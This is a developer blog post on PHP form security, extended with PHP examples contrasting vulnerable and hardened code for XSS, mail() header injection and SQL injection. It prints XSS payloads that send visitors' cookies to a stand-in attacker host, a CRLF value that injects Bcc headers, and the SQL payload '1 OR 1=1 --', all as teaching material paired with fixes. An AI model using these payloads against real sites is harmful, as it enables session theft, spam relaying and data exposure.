BLOG: Mitch Wilson, Austin TX Web & Multimedia Developer – Austin, TX

15 Apr 2009

HTML, JavaScript and PHP form security

How about a refresher on PHP form security? Follow these simple steps to cover the basics. Then sleep better at night knowing you have improved the World Wide Web. (Seriously, get some good sleep, you need it.)

Know thy enemy

The whole security issue comes from two simple facts:

  • First fact: certain characters and sequences of characters have special meaning to the program that reads them.
    Example: a left angle bracket, in HTML context, starts a tag; in JavaScript, it means less than.
  • Second fact: Web sites publish forms that let anyone submit text, and your server then stores that text, re-sends it or renders it back into a page.
    Example: in the comments form, users type text into various fields. Is a given user entering plain text and the tags you allow, or carefully crafted text containing HTML, JavaScript or another language that will run either on your server or in another visitor's browser when the comment is displayed?

Malicious client-side HTML and JavaScript

A left angle bracket, in HTML, starts a tag, and the sequence <script> starts a script element. If you let users submit HTML tags in your form and render them back out unchanged, you have just opened the door to attack. A common example: the attacker posts a malicious link as part of a message or comment on the target Web site, using HTML and JavaScript in the message body. The href is a javascript: URL, so when a user clicks it the script runs inside your site's origin, where document.cookie returns the cookies your site set for that user (cookies flagged HttpOnly are hidden from scripts and survive this). The script then sends the browser to the attacker's PHP file with those cookies in the query string:

<a href="javascript:location='http://badsite/attacker.php?cookie='+document.cookie">Click here to win</a>

Of course, if you do not filter or encode the data at all and let JavaScript run, the attacker does not even need the user to click a link. A <script> block inside the comment runs for every visitor who views the page:

Hi, great site! <script>location="http://badsite.com/attacker.php?cookie="+document.cookie;</script>

That is a client-side attack written in HTML and JavaScript, with a PHP file on the attacker's server collecting the result. Let's look at a server-side attack example, then we'll see how to combat both.
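Here is the comment-rendering step with and without output encoding, as an added example that is not part of the original post. The comment string is the payload from above; render_comment_unsafe(), render_comment_safe(), contains_script_tag() and set_session_cookie() are names chosen for this example, and the cookie helper assumes PHP 7.3 or later (array form of setcookie()) and a site served over HTTPS.

```php
<?php
// Added example (not from the original post): rendering a stored comment
// with and without output encoding. The comment text is constructed to
// match the payload shown in the post.
declare(strict_types=1);

// The attacker's comment, exactly as submitted through the form.
$comment = 'Hi, great site! <script>location="http://badsite.com/attacker.php?cookie="+document.cookie;</script>';

// Vulnerable: the stored text is dropped straight into the page. The browser
// sees a real <script> element and runs it in every visitor's session.
function render_comment_unsafe(string $text): string
{
    return '<div class="comment">' . $text . '</div>';
}

// Hardened: encode at the point of output. ENT_QUOTES also encodes ' and ",
// so the value is safe inside attribute values, not only in element bodies;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function render_comment_safe(string $text): string
{
    return '<div class="comment">'
        . htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '</div>';
}

// True when the rendered markup still contains a live script tag.
function contains_script_tag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Defence in depth (assumption: HTTPS site, PHP >= 7.3): a session cookie
// flagged HttpOnly cannot be read by document.cookie, so even a successful
// injection cannot steal it the way the post's payload tries to.
function set_session_cookie(string $value): bool
{
    return setcookie('sid', $value, [
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
        'path'     => '/',
    ]);
}

// Cookie first, before any output, or the header can no longer be sent.
set_session_cookie(bin2hex(random_bytes(16)));

echo render_comment_unsafe($comment), PHP_EOL;   // the <script> element survives intact
echo render_comment_safe($comment), PHP_EOL;     // it comes out as inert &lt;script&gt; text
var_dump(contains_script_tag(render_comment_unsafe($comment)));
var_dump(contains_script_tag(render_comment_safe($comment)));
```

The encoding is deliberately done in the render function, not when the comment is saved: stored text stays intact for editing or for other output formats, and every place that emits HTML applies the same rule.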

Malicious server-side PHP
By adding \r\n in a field that will be used to create an e-mail header for the PHP mail() function, an attacker can append their own headers (extra recipients, a forged From:, a Bcc: list) and send e-mail from your Web site to whomever they want. Your site's online contact form becomes a spam relay. The version range given in the original post (PHP 4 <= 4.4.6 and PHP 5 <= 5.2) refers to a bug in the sanitizing that mail() applies to its own to and subject arguments, fixed in the releases that followed; the additional_headers argument is not sanitized that way in any PHP version, so a form field interpolated into it stays injectable regardless of which PHP you run. The fix belongs in your code.

Rather than trying to strip the dangerous bytes, validate the address against what it is allowed to contain. Per RFC 5322, the local-part of an e-mail address (the text before the @) may use any of these ASCII characters:

  • Uppercase and lowercase English letters (a-z, A-Z)
  • Digits 0 through 9
  • Characters ! # $ % & ' * + - / = ? ^ _ ` { | } ~
  • Character . provided that it is not the first nor last character, nor may it appear two or more times consecutively.

Carriage return and line feed are not on that list, so a whitelist check rejects header injection by construction, whichever header the value ends up in.
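The contact-form header step, as an added example that is not the post's own code: the vulnerable header builder beside a validating one that applies the local-part rules above, adds a simple domain rule, and rejects rather than strips. All function names, both regular expressions and the attacker input are constructed for this example; the domain rule is an assumption kept deliberately simple (letters, digits and hyphens in each label, a top-level label of two or more letters) and is stricter than what the RFC permits.

```php
<?php
// Added example (not from the original post): building mail() headers from a
// contact-form field, first the vulnerable way, then with validation that
// rejects anything outside the local-part rules listed in the post.
declare(strict_types=1);

// Constructed attacker input: a valid-looking address followed by CRLF and an
// extra header. Interpolated unchecked into "From:", it becomes a spam relay.
$attackerEmail = "bob@example.com\r\nBcc: victim1@example.org, victim2@example.org";
$honestEmail   = 'bob@example.com';

// Vulnerable: the raw field goes into the additional_headers argument of
// mail(). Every CRLF inside it starts a new header line.
function build_headers_unsafe(string $from): string
{
    return "From: $from\r\nReply-To: $from\r\n";
}

// Local-part rule from the post: the listed ASCII characters, with dots
// allowed but not leading, trailing or doubled.
const LOCAL_PART_RE = '/^(?!\.)(?!.*\.\.)[A-Za-z0-9!#$%&\'*+\/=?^_`{|}~.]+(?<!\.)$/';
// Domain rule (assumption, simplified): hostname labels plus an alphabetic TLD.
const DOMAIN_RE = '/^(?=.{1,253}$)([A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,}$/';

function is_safe_email(string $email): bool
{
    // Any CR or LF is a header-injection attempt: reject outright, never strip.
    if (preg_match('/[\r\n]/', $email)) {
        return false;
    }
    $parts = explode('@', $email);
    if (count($parts) !== 2) {
        return false;
    }
    [$local, $domain] = $parts;
    return strlen($local) <= 64
        && preg_match(LOCAL_PART_RE, $local) === 1
        && preg_match(DOMAIN_RE, $domain) === 1
        // PHP's own validator as a second opinion.
        && filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

// Hardened: refuse to build headers from anything that fails validation.
function build_headers_safe(string $from): string
{
    if (!is_safe_email($from)) {
        throw new InvalidArgumentException('Rejected e-mail address');
    }
    return "From: $from\r\nReply-To: $from\r\n";
}

// Counts non-empty header lines; more than two means headers were injected.
function count_header_lines(string $headers): int
{
    return count(array_filter(explode("\r\n", $headers)));
}

echo count_header_lines(build_headers_unsafe($honestEmail)), ' header lines from the honest address', PHP_EOL;
echo count_header_lines(build_headers_unsafe($attackerEmail)), ' header lines from the attacker (Bcc injected twice)', PHP_EOL;
var_dump(is_safe_email($honestEmail));
var_dump(is_safe_email($attackerEmail));
try {
    build_headers_safe($attackerEmail);
} catch (InvalidArgumentException $e) {
    echo 'Hardened builder: ', $e->getMessage(), PHP_EOL;
}
```

Rejecting is the right response: an address with a newline in it was not typed by a person filling in the form, and silently "cleaning" it would let the rest of the submission through as if it were legitimate.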

The same problem appears wherever a $_GET or $_POST value is used without checking it. First the unsafe way: the value is echoed straight into the page, so a visitor who follows a crafted link gets the attacker's markup rendered in your site's origin:

    <?php
    // copy the value from $_GET to $id
    $id = $_GET['id'];
    echo "thanks for sending me $id, dude!";   // reflected XSS: whatever was in ?id= lands in the page

    // just use the $_GET val directly
    echo 'it\'s even more awesome to grab '.$_GET['id'].' directly from input, right?';   // same problem

Then two fixes for the SQL side. mysql_real_escape_string() needs an open mysql_* connection, only protects a value that is placed inside quotes in the query, and was removed in PHP 7 together with the rest of the mysql_* extension; intval() is the sturdier choice for a numeric id. Neither makes $id safe to echo into HTML, for that it still needs htmlspecialchars():

    <?php
    // escaped, so not a potential SQL injection threat (when placed inside quotes in the query)
    $id = mysql_real_escape_string($_GET['id']);
    echo "Now I know that $id is totally safe to insert into my database";

    // cast as int, so it cannot carry quotes, spaces or SQL keywords
    $id = intval($_GET['id']);
    echo "$id is most certainly an integer now";
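An added example, not from the original post, that contrasts the concatenated query, the intval() cast and a prepared statement under PDO. It uses an in-memory SQLite database through pdo_sqlite so that it runs offline; the table, its rows, the function names and the attacker's ?id= value are all constructed for the demonstration. The prepared statement goes beyond the post's two fixes: it protects string values as well as numeric ones, because the value never becomes part of the SQL text.

```php
<?php
// Added example (not from the original post): three ways of using a
// query-string id in SQL. Requires the pdo_sqlite extension; the data is constructed.
declare(strict_types=1);

function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, secret INTEGER)');
    $db->exec("INSERT INTO posts VALUES (1, 'public post', 0), (2, 'draft', 1), (3, 'admin notes', 1)");
    return $db;
}

// Vulnerable: the raw value is concatenated into the SQL. Because the id is
// unquoted, escaping quotes would not help either: the payload contains none.
function fetch_titles_unsafe(PDO $db, string $id): array
{
    return $db->query("SELECT title FROM posts WHERE id = $id AND secret = 0")
              ->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened 1: cast, as the post does with intval(). Anything after the
// leading digits is discarded, and a non-numeric value becomes 0.
function fetch_titles_intval(PDO $db, string $id): array
{
    $id = intval($id);
    return $db->query("SELECT title FROM posts WHERE id = $id AND secret = 0")
              ->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened 2: a prepared statement. The value travels separately from the
// SQL text, so it can never change the query's structure, whatever it holds.
function fetch_titles_prepared(PDO $db, string $id): array
{
    $stmt = $db->prepare('SELECT title FROM posts WHERE id = :id AND secret = 0');
    $stmt->execute([':id' => $id]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = make_db();
// Constructed attacker value for ?id=. The "--" comments out "AND secret = 0".
$payload = '1 OR 1=1 --';

echo "Concatenated: ";  print_r(fetch_titles_unsafe($db, $payload));    // every row, secrets included
echo "intval():     ";  print_r(fetch_titles_intval($db, $payload));    // only row 1
echo "Prepared:     ";  print_r(fetch_titles_prepared($db, $payload));  // nothing: no id equals that string
echo "Prepared, honest input: "; print_r(fetch_titles_prepared($db, '1'));
```

intval() is fine for an id, but it has nothing to offer for a search term or a user name; the prepared statement covers those too, and it is the form to reach for first.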

Ninja Webmaster Techniques

  • Encode on output: pass every user-supplied value through htmlspecialchars() or htmlentities() (with ENT_QUOTES and the page's charset) at the point where it is echoed into HTML, not when it is stored.
  • Validate on input against what the field may legitimately contain (intval() for a numeric id, the character rules above for an e-mail address, a fixed list of values for a select box) and reject anything else. Stripping individual suspicious characters such as backslashes and curly braces is a weaker substitute: it is easy to bypass and still leaves the value unencoded.

Recap: HTML and JavaScript injection, PHP mail() header vulnerabilities

  • Cross-site scripting (XSS)
    Example: adding a script tag in a comment on your site to read your users' cookies.
  • Input (code) injection
    Example: submitting PHP code or shell syntax in a form field that your server then passes to eval(), include() or a shell command, so it runs on your server.
  • Mail header injection
    Example: adding \r\n in an e-mail form field followed by custom headers, to send spam from your Web site.

Disclaimer

I am not a security professional. I am a Web developer, like you. I presented common best practices. In addition, you should have a professional hosting service or server administrator who knows what they are doing, and you should communicate with them and follow their advice to make sure your Web site is as secure as possible.

Filed under: Geek Out